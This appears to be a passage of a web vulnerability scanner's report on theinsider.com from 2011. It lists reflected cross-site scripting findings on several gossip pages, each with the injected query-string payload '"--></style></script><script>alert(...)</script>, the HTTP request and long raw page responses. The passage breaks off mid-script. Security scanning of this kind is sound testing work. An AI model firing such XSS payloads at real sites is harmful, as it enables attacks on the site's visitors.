type="thumbnail"> <Attribute name="src" value="http://www.theinsider.com/media/photo/2011/08/81973/vid_kelly_150_114111370.jpg" /> <Attribute name="width" value="150" /> <Attribute name="height" value="150" /> </DataObject></PageMap><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="/swfobject.js"></script><script src="/new_insider/jcapslide.js" type="text/javascript"></script><link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="Scripts/swfobject_modified.js" type="text/javascript"></script><style>.ins_fb_text { display: block; left: 2px; position: absolute; top: 42px;}.ad_center { margin: 0 auto; width: 728px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--> <!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip_video;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip_video;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip_video;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div> <!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> <div id="top_searches"> <p>TOP SEARCHES: </p><script language="javascript"> function searchPost(term) { document.forms["cse-search-box"].elements[0].value = term; document.forms["cse-search-box"].submit(); return true; }</script> <div class='searchterms'></div> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div> <!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div> </div> <div class="clearfix"></div> <!-- END HEADER --> <!-- MAIN CONTENT --> <!-- BELOW: article.mc --><!– Acudeo companion banner loader script –> <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script> <script type="text/javascript"> function displayCompanionBanners(banners) { tmDisplayBanner(banners, "adCompanionBanner", 300, 250); } </script> <!– Acudeo companion banner loader script –> <link rel='stylesheet' href='/inc/gossip/gossip.css' type='text/css' /><!--[if IE 7]><style>.contrib_date1 { font-size: 12px !important; font-weight: bold; margin: -10px 0 0 5px; font-family: 'AvalonBook',Futura,"Futura BT","Century Gothic",Tahoma,Helvetica,"Helvetica Neue",Arial,sans-serif;}.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}.lovethis_storylist ul {margin-left: 30px;}.contrib_date { font-size: 12px; font-weight: bold; margin: 0 0 0 68px;}</style><![endif]--><style>.contrib_date1 { font-size: 11px !important; font-weight: normal !important; margin: 12px 0 0 5px !important; font-family: Tahoma, Helvetica, Arial, sans-serif;}.article-more-news-box img{float: left; margin-right: 15px;}#adCompanionBanner {background-color: white; text-align: left; margin: 10px 10px 10px 0;}.article-more-news-box {height: 100%; margin-bottom: 20px;}.contributor_bug {display: inline; height: 15px; padding: 0 0 0 10px; vertical-align: bottom; width: 71px;}.contrib_border { border-right: 1px solid #BBBBBB; float: left; font-size: 12px; font-weight: bold; line-height: 1; margin: -10px 0; font-family: Tahoma, Helvetica, Arial, sans-serif; padding-bottom:4px;} .contrib_border a:link, .contrib_border a:hover, .contrib_border a:visited, .contrib_border a:active {font-weight:bold;}.contrib_date {font-size: 12px; font-weight: bold; margin: -0px 0 0 68px;}.contrib_by { display: inline; float: left; font-size: 10px; height: 8px; margin: -7px 0 9px 0; width: 200px;}.contrib_container {height: 40px; border-bottom: 1px solid #000; float:left; width: 300px; padding-bottom:8px;}.contrib_cont {width: 300px; display: inline; height: 63px; float:left; margin: 0px 10px 10px 0px;}</style><!-- Main Content --><div id="main_content"><!-- LEFT COLUMN --><div id="left_col"><!-- CHANNEL TITLE --><div id="channel_title_bar"><a href='/gossip'><img src='/media/img/channel_page_name_gossip.png' class='channel_title_logo' alt='' /></a></div><!-- END CHANNEL TITLE --><!-- STORY CONTAINER --><div class="content_container"><div class="channel_story_img"> <div id='slate_player' class='show_slate' style='z-index: 2;'><object id='flashobject' type='application/x-shockwave-flash' allowScriptAccess='always' allowFullScreen='true' allowNetworking='all' height='272' width='431' data ='http://www.theinsider.com/media/flash/unicorn/UMInterface_Tremor.swf'><param name='quality' value='high' /><param name='allowFullScreen' value='true' /><param name='allowScriptAccess' value='always' /><param name='allowNetworking' value='all' /><param name='movie' value='http://www.theinsider.com/media/flash/unicorn/UMInterface_Tremor.swf'/><param name='flashvars' value='config=http://r.unicornmedia.com/embed/ab2b5d77-6ea3-4720-8249-dccf2b6bac03?view=fkey%26view_id=43354&programID=4dd16b9508b2e' /></object></div><div id='adCompanionBanner'></div> </div><p class='article'><h3>Kelly Osbourne vs. the Paparazzi [video]</h3><p class='publish_date'>By ANTOINETTE BUENO</p><p class='publish_date'>August 12, 2011</p><p>
Well she's never been known <a target="_blank" href="http://cs1.theinsider.com/gossip/43159_Trash_Talk_Kelly_Osbourne_Slams_Christina_Aguilera_Calls_Singer_Fat_Btch/index.html">to hold back</a> has she? Kelly Osbourne was in a less than friendly mood when paparazzi swarmed her as she left <a target="_blank" href="http://www.theinsider.com/news/40532_Paparazzi_Roundup_Will_Smith_Takes_NY_Kelly_Osbourne_in_LA_and_More/index.html">the Roosevelt Hotel</a> in Hollywood Wednesday night, and the tense scene was caught on tape.<br /></p><p>
Holding a fan over her face, the paparazzi seem to be genuinely offended when Kelly apparently called them a foul name, with one paparazzo shouting, &quot;C'mon Kelly, be nice, we're being nice to you!&quot;</p><p>
Check out the video for Kelly's amusing response.













</p><!-- <a href='' target='_blank'><img src='' alt='' class='contributor_bug' /></a> --></p> <!-- SOCIAL SHARE BTNS --> <div id="end_article_social_btns"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like> <!-- TWEET BTN --> <a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> </div> <!-- END SOCIAL SHARE BTNS --> <div class="clearfix"></div> <!-- FB COMMENTING --> <div id="comments"> <h5 class="section_headings comments_heading">WHAT ARE YOUR THOUGHTS?</h5> <fb:comments href='http://www.theinsider.com/gossip/43359_Kelly_Osbourne_s_Tense_Paparazzi_Confrontation_video/index.html' num_posts='4' width='660'></fb:comments> </div> <div class="clearfix"></div> <!-- END FB COMMENTING --> <div id="outbrain_suggestions_wide"><img src="/media/img/outbrainheader.gif" alt="" /><script type="text/JavaScript">var OB_permalink= 'http://www.theinsider.com';var OB_Template="insider";var OB_widgetId= 'AR_1';var OB_langJS ='http://widgets.outbrain.com/lang_en.js';if ( typeof(OB_Script)!='undefined' )OutbrainStart();else{var OB_Script = true;var str = "<script src='http://widgets.outbrain.com/outbrainWidget.js'; type='text/javascript'></"+"script>";document.write(str);}</script></div> <div class="clearfix"></div></div> <div class="article-more-news"> <h3>MORE NEWS</h3><div class="article-more-news-box"><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html"><img src="/media/photo/2011/10/93494/mute_112.jpg" alt="" class="article-more-news-150thumb" /></a><div class="ins_story_float"><h5><a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-more-news-headline">Now You Know: MUTEMATH</a></h5><div class="article-more-news-text"><p>In the latest example of my music industry influence, and totally humble mindset, VH1 has selected MUTEMATH (a band I declared <a href="http://www.theinsider.com/tunes/43255_MUTEMATH_Blood_Pressure_Song_Premiere/index.html" target="_blank">you &quot;must-kno... <a href="/tunes/45573_MUTEMATH_Performs_Spotlight/index.html" class="article-readmore">more</a></p></a></p><p class="article-more-news-published-info">Published </p><div style="clear:both;"></div></div></div></div><div class=&..
- /gossip/38520_Celebrity_Couples_Status_Update/

/gossip/38520_Celebrity_Couples_Status_Update/

http://www.theinsider.com/gossip/38520_Celebrity_Couples_Status_Update/?'%22--%3E%3C/style%3E%3C/scr..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002618)</script>

Request

GET /gossip/38520_Celebrity_Couples_Status_Update/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/gossip/38520_Celebrity_Couples_Status_Update/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:09:13 GMT
Content-Length: 19098
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Celebrity Couples Status Update - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="celebrity couple update, Celebrity Couples Status Update, gallery, gossip, status update" /> <meta name="category" content="gossip" /> <meta name="date" content="2011-09-20 11:22:00" /><meta property="og:title" content="Celebrity Couples Status Update" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/38520_Celebrity_Couples_Status_Update/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/ashlee_simpson_vincent_piazza_jkravitz_180911_125605999_150.jpg" /><meta property="og:description" content="From breaking up to hooking up, here's a look at some stars in the midst of real to rumored romances (or lack thereof).First up we've got Ashlee Simpson and Vincent Piazza.Ashlee and the Boardwalk Empire actor have only been dating for a few months, but that is apparently enough time for Vincent to introducethe singer/actresstohis parents.The couple and Vincent's parents were spotteddining together Sunday night after the Emmy Awards at HBO's star-studded after party in West Hollywood, Us Weekly reports.The photo shows Ashlee and Vincent getting cozy at the HBO bash." /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-09-20 11:22:00" /><Attribute name="sdate" value="20110920" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/photo/ashlee_simpson_vincent_piazza_jkravitz_180911_125605999_150.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script type="text/javascript" src="/swfobject.js"></script> <script src="/new_insider/jcapslide.js" type="text/javascript"></script> <link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <style> .ins_fb_text { display: block; left: 2px; position: absolute; top: 42px; } .ad_center { margin: 0 auto; width: 728px; } </style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip_gallery;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip_gallery;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip_gallery;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --><div id="container"> <!-- HEADER --> <div id="header"> <!-- LOGO --> <div id="logo"><a href="http://www.theinsider.com/" title="The Insider.com"><span>The Insider.com</span></a></div> <!-- END LOGO --> <div id="search_join_nav"> <!-- SEARCH BOX --> <div id="search"> <div id="search_wrapper"> <form action="/search/index.html?sort=date-sdate" id="cse-search-box" method="POST"> <div> <input type="text" class="searchbox" name="q" value="SEARCH THE INSIDER.COM" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}"> <input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa"> <input type="hidden" name="hq" value="more:recent4" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> </div> </div> <!-- END SEARCH BOX --> <!-- SOCIAL JOIN BUTTONS --> <div class="large_social_btns"> <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/theinsider&amp;send=false&amp;layout=button_count&amp;width=110&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:21px;" allowTransparency="true" class="social_join fb"></iframe> <a href="http://www.twitter.com/theinsider" target="_blank" title="Follow Us on Twitter"><img src="/media/img/tw_joinus.jpg" alt="Follow Us on Twitter" class="social_join tw" /></a> <div style="position:absolute"><img class="ins_fb_text" alt="The Insider on Facebook" src="/media/img/ins_on_fb.jpg"></div> </div> <!-- END SOCIAL JOIN BUTTONS --> <div class="clearfix"></div><!-- NAVIGATION -->
<div id="navbar">
<ul>
<li> <a href="/fashion"><img src="/media/img/fashion.png" alt="[ FASHION ]" /> <span class="fashion"></span> </a> </li>
<li> <a href="/lol"><img src="/media/img/lol.png" alt="[ LOL ]" /> <span class="humor"></span> </a> </li>
<li> <a href="/screen"><img src="/media/img/screen.png" alt="[ SCREEN ]" /> <span class="filmtv"></span> </a> </li>
<li> <a href="/gossip"><img src="/media/img/gossip.png" alt="[ GOSSIP ]" /> <span class="gossip"></span> </a> </li>
<li> <a href="/thelook"><img src="/media/img/thelook.png" alt="[ THE LOOK ]" /> <span class="beauty"></span> </a> </li>
<li> <a href="/tunes"><img src="/media/img/tunes.png" alt="[ TUNES ]" /> <span class="tunes"></span> </a> </li>
</ul>
</div>
<!-- END NAVIGATION --> <h1>The Insider.com</h1> </div></div><div class="clearfix"></div><!-- END HEADER --><!-- MAIN CONTENT --><!-- BELOW: gallery.mc --><link rel='stylesheet' href='/inc/gossip/gossip.css' type='text/css' /><link rel="stylesheet" href="/new_insider/jcapslide_css.css" type="text/css" /><script type="text/javascript">var cookie_booroo=0, random_booroo=0, enddate_booroo=0, maxchecked_booroo=0, jsonurl_booroo='http://booroo.com/app/vote.asp', customurl_booroo='';</script><script src="/new_insider/jcapslide.js" type="text/javascript"></script><style>.img_link {height:410px; display:block;}.hide_thumb{visibility: hidden;}#left_col {width: 600px;}body{font-size:0.825em; color:#666; font-family:Arial, Helvetica, sans-serif;}.clear{clear:both;}</style><!--[if IE 7]><style type="text/css">#main {left: -50px; margin: 10px auto; position: relative; top: -20px; width: 410px;}#gallery_nav_back {display: inline; float: left; height: 404px; text-align: left; width: 168px; position: relative; left: -34px; top: 0px;}#gallery_nav_next {display: inline; float: left; height: 535px; text-align: right; width: 167px; position: relative; left: 33px; top: 0px;}.lovethis_storylist ul {margin-left: -16px;}</style><![endif]--> <!-- MAIN CONTENT --><div id="main_content"> <!-- LEFT COLUMN --> <div id="left_col"> <!-- CHANNEL TITLE --> <div id="channel_title_bar"> <a href='/gossip'><img src='/media/img/channel_page_name_gossip.png' class='channel_title_logo' alt='' /></a> </div> <!-- END CHANNEL TITLE --> <!-- GALLERY CONTAINER --> <div class="content_container"><!-- START PHOTO GALLERY --> <h2 class="featured-photo-gallery-heading" style="line-height: 100%;">Ashlee Simpson Meets New Beau's Parents</h2> <div> <div class="photo_container_left"> <div id="photo-gallery-main" onMouseOut="hidenav()" onMouseOver="shownav()"> <!-- <div id="photo-gallery-main"> --> <div id="gallery_nav"> <div id="gal_buttons" style="visibility:visible"> <div id="gallery_nav_back"> <a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=82"><img src="/media/img/PhotoGalleryArrows_left.jpg" border="0" class="nav_button" /></a> </div> <div id="gallery_nav_next"> <a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=2"><img src="/media/img/PhotoGalleryArrows_right.jpg" border="0" class="nav_button" /></a> </div> </div> </div> <div class="featured-photo-gallery-img1"> <a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=2" class="img_link"> <!-- BEGIN SINGLE IMAGE OPTION--><img src="/media/photo/ashlee_simpson_vincent_piazza_jkravitz_180911_125605999_335_pix.jpg" border="0" alt="ashlee_simpson_vincent_piazza_jkravitz_180911" /><!-- END SINGLE IMAGE OPTION--> </a> <p class="copyright_img" style="margin: 0px; font-size: 10px;">Copyright 2011 Jeff Kravitz/ Getty Images</p> <!-- END of Gallery Nav --> <div class="clearfix"></div> </div> </div> <!-- photo div --> <div class="clearfix"></div> <h3 class="image-title">Celebrity Couples Status Update</h3> <div id='article_date'>September 20, 2011</div> <div class="caption"> <p class="featured-photo-gallery-text featured_margin_fix" style="margin: 0; width: 380px;"><p>From breaking up to hooking up, here's a look at some stars in the midst of <a href="http://cm1.theinsider.com/gossip/40647_They_Dated_Surprising_Hookups/index.html?photo=10" target="_blank">real to rumored romances</a> (or lack thereof).&nbsp;First up we've got Ashlee Simpson and Vincent Piazza.</p><p>Ashlee and the <em>Boardwalk Empire</em> actor have only been dating for a few months, but that is apparently enough time for Vincent to introduce&nbsp;the singer/actress&nbsp;to&nbsp;his parents.</p><p>The couple and Vincent's parents were spotted&nbsp;dining together Sunday night after the Emmy Awards at HBO's star-studded after party in West Hollywood, <a href="http://www.usmagazine.com/celebritynews/news/ashlee-simpson-meets-beau-vincent-piazzas-parents-2011209" target="_blank">Us Weekly reports</a>.</p><p>The photo shows Ashlee and Vincent getting cozy at the HBO bash.</p></p><!-- SOCIAL SHARE BTNS --><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script><script src="http://booroo.com/app/polltheme/2/poll.js" type="text/javascript"></script><div class="clearfix"></div> <div id="social_share_buttons" style="margin: 10px 0 20px 0;"> <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://www.theinsider.com/gossip/38520_Celebrity_Couples_Status_Update/index.html" send="true" width="90" show_faces="false" layout="button_count" font="arial"></fb:like></div> <!-- TWEET BTN --> <div style="float: left; margin-top:10px;"> <a href='http://www.twitter.com/home?status=Celebrity+Couples+Status+Update+http://theinsider.com/p/?7rfa2k+via+@theinsider' class='twitter-share-button'><img src='/media/img/tweet_png.png' class='video-sm-icons_' style='margin-bottom:-3px'/></a> <!--<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>--> </div> </div> <!-- END SOCIAL SHARE BTNS --> </div> </div><div class="photo_container_right" > <!-- thumbs --> <div id="main" > <ul id="holder" class="hide_thumb"> <li><a href="#" class="featured-photo-gallery-thumb-link"><img class="featured-photo-gallery-selector1" height="81px" width="81px" src="/media/photo/ashlee_simpson_vincent_piazza_jkravitz_180911_125605999_150.jpg" alt="" class="featured-photo-gallery-thumb"></a></li><li><a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=2" class="featured-photo-gallery-thumb-link"><img src="/media/photo/2011/09/87106/britney_spears_jason_trawick_150.jpg" alt="" height="81px" width="81px" class="featured-photo-gallery-thumb"></a></li><li><a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=3" class="featured-photo-gallery-thumb-link"><img src="/media/photo/david_schwimmer_zoe_schwimmer_dward_101110_106693104_150.jpg" alt="" height="81px" width="81px" class="featured-photo-gallery-thumb"></a></li><li><a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=4" class="featured-photo-gallery-thumb-link"><img src="/media/photo/ryan_gosling_jkempin_190711_119389593_emendes_awalker_117159541_150.jpg" alt="" height="81px" width="81px" class="featured-photo-gallery-thumb"></a></li><li><a href="/gossip/38520_Celebrity_Couples_Status_Update/index.html?photo=5" class="featured-photo-gallery-thumb-link"><img src="/media/photo/rachel_weisz_daniel_craig_150_104069750_103074853_REV.jpg" alt="" height="81px" width="81px" class="featured-photo-gallery-thumb"></a></li><..
- /gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html

/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html

http://www.theinsider.com/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html?'%22--%3E%3C/..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00263C)</script>

Request

GET /gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/gossip/39237_Before_They_Were_Famous/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=299
Date: Tue, 06 Dec 2011 07:09:16 GMT
Content-Length: 13090
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Say What ...?! Heidi Montag the Book Lover?!</title><meta name="description" content="" /><meta name="keywords" content="heidi montag, Hunger Games, reality show couples, reality tv" /><meta name="category" content="gossip" /><meta name="date" content="2011-08-12 13:55:00" /><meta property="og:title" content="Say What ...?! Heidi Montag the Book Lover?!" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/43370_Say_What_Heidi_Montag_the_Book_Lover/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/06/74605/heidi_montag_150.jpg" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="og:description" content="Well now I've really heard it all! Prepare yourself pop-culture enthusiasts-- apparently Heidi Montag reads ...books! Say whaaaaaat!? I know, I'm just as shocked as you are. " /><meta property="fb:app_id" content="123263397703043"/><PageMap> <DataObject type="date"> <Attribute name="displaydate" value="2011-08-12 13:55:00" /> <Attribute name="sdate" value="20110812" /> </DataObject> <DataObject type="thumbnail"> <Attribute name="src" value="http://www.theinsider.com/media/photo/2011/06/74605/heidi_montag_150.jpg" /> <Attribute name="width" value="150" /> <Attribute name="height" value="150" /> </DataObject></PageMap><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="/swfobject.js"></script><script src="/new_insider/jcapslide.js" type="text/javascript"></script><link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /><script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="Scripts/swfobject_modified.js" type="text/javascript"></script><style>.ins_fb_text { display: block; left: 2px; position: absolute; top: 42px;}.ad_center { margin: 0 auto; width: 728px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var 